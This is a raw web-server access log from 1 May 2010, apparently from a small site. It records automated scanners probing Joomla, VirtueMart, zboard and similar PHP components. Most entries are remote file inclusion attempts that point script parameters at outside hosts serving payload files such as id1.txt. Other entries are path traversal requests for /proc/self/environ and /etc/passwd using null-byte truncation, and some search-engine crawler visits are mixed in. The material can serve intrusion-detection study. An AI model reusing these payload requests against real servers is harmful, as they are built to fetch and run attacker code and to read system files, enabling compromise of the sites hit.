211.232.85.247 - - [01/May/2010:08:40:25 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:08:40:26 -0500] "GET /logs/access_log.1263081600//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:08:41:27 -0500] "GET /logs/access_log.1213315200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.39.162 - - [01/May/2010:08:41:41 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:41:41 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:41:41 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.199.45 - - [01/May/2010:08:41:55 -0500] "GET /logs/access_log.1256688000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.39.162 - - [01/May/2010:08:42:57 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:42:57 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:42:57 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:42:57 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:08:43:12 -0500] "GET /?sourcedir=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:08:43:12 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:08:43:12 -0500] "GET /logs/?sourcedir=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 200 3853 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:14 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:14 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:14 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:14 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:08:43:14 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:08:43:14 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:08:43:15 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
70.38.117.233 - - [01/May/2010:08:43:40 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:42 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:42 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:43:43 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:09 -0500] "GET ///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:09 -0500] "GET /logs/access_log.1268956800%20%20///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:09 -0500] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:31 -0500] "GET /logs/access_log.1268956800%20%20///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:31 -0500] "GET ///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.125.133.87 - - [01/May/2010:08:44:31 -0500] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
72.52.208.228 - - [01/May/2010:08:44:40 -0500] "GET /logs//galeria.php?start=0&kategoria=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
72.52.208.228 - - [01/May/2010:08:44:40 -0500] "GET //galeria.php?start=0&kategoria=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
222.236.47.182 - - [01/May/2010:08:45:04 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.13.136 - - [01/May/2010:08:46:54 -0500] "GET /logs/access_log.1183680000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.39.162 - - [01/May/2010:08:47:15 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:23 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:23 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:23 -0500] "GET /logs/access_log.1229212800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:26 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:26 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:08:48:26 -0500] "GET /logs/access_log.1229212800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 349 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:16 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:16 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:16 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:16 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:16 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:17 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:17 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:17 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:17 -0500] "GET /logs/access_log.1266019200//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:51:18 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:40 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:40 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
210.245.85.109 - - [01/May/2010:08:51:40 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
96.9.174.8 - - [01/May/2010:08:51:45 -0500] "GET /logs///index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
210.245.85.109 - - [01/May/2010:08:51:45 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
96.9.174.8 - - [01/May/2010:08:51:46 -0500] "GET ///index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
87.250.255.243 - - [01/May/2010:08:52:01 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.245.85.109 - - [01/May/2010:08:52:10 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
69.175.39.162 - - [01/May/2010:08:52:35 -0500] "GET /logs/access_log.1262649600//bbs/skin/dognara_gallery/error.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
99.39.2.249 - - [01/May/2010:09:05:37 -0500] "GET /logs//_functions.php?prefix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
99.39.2.249 - - [01/May/2010:09:05:38 -0500] "GET //_functions.php?prefix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.204.232 - - [01/May/2010:09:06:55 -0500] "GET /logs/access_log.1239494400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.52.208.228 - - [01/May/2010:09:07:49 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.831"
222.236.47.182 - - [01/May/2010:09:07:57 -0500] "GET /logs//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:09:07:57 -0500] "GET /logs/access_log.1265760000//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:09:07:57 -0500] "GET //bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:09:09:47 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:09:09:47 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:09:09:48 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.52.208.228 - - [01/May/2010:09:13:32 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 345 "-""libwww-perl/5.831"
72.52.208.228 - - [01/May/2010:09:13:33 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""libwww-perl/5.831"
72.52.208.228 - - [01/May/2010:09:13:33 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
115.124.119.4 - - [01/May/2010:09:13:34 -0500] "GET //zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:13:34 -0500] "GET /logs//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:13:34 -0500] "GET /logs/access_log.1251504000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:13:39 -0500] "GET /logs/access_log.1263859200//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:16 -0500] "GET //zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:16 -0500] "GET /logs/access_log.1251504000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:17 -0500] "GET /logs//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:20 -0500] "GET /logs/access_log.1262736000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:21 -0500] "GET /logs//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:21 -0500] "GET /logs/access_log.1251504000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:22 -0500] "GET //zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:24 -0500] "GET /logs/access_log.1262736000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:29 -0500] "GET /logs//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:29 -0500] "GET //zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:30 -0500] "GET /logs/access_log.1251504000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:14:33 -0500] "GET /logs/access_log.1262736000//zboard/skin/kmusic7_mmd3/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:09:15:48 -0500] "GET /logs/access_log.1264464000//bbs/skin/dognara_gallery/error.php?dir=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
122.199.140.158 - - [01/May/2010:09:16:00 -0500] "GET //admin.gmajax.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.199.140.158 - - [01/May/2010:09:16:00 -0500] "GET /logs//admin.gmajax.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.199.140.158 - - [01/May/2010:09:16:00 -0500] "GET /logs/access_log.1264809600//admin.gmajax.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.199.140.158 - - [01/May/2010:09:16:21 -0500] "GET /logs/access_log.1266364800//admin.gmajax.php?mosConfig_absolute_path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.115.111.248 - - [01/May/2010:09:17:17 -0500] "GET /logs/access_log.1218499200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:09:17:19 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:09:17:21 -0500] "GET /logs/access_log.1237248000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/May/2010:09:17:24 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
89.248.168.41 - - [01/May/2010:09:17:34 -0500] "GET /logs/index.php HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; 6.0; Windows NT 5.1"
207.46.13.91 - - [01/May/2010:09:18:54 -0500] "GET /logs/access_log.1223942400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.44 - - [01/May/2010:09:18:55 -0500] "GET /logs/access_log.1209945600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.244.203.2 - - [01/May/2010:09:19:07 -0500] "GET /logs//admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
125.244.203.2 - - [01/May/2010:09:19:08 -0500] "GET //admin.gmajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
121.190.102.21 - - [01/May/2010:09:19:26 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:09:19:26 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:09:19:26 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:20:41 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:20:41 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:20:42 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:20:59 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:20:59 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:21:00 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:21:19 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:21:19 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:21:19 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:09:21:33 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
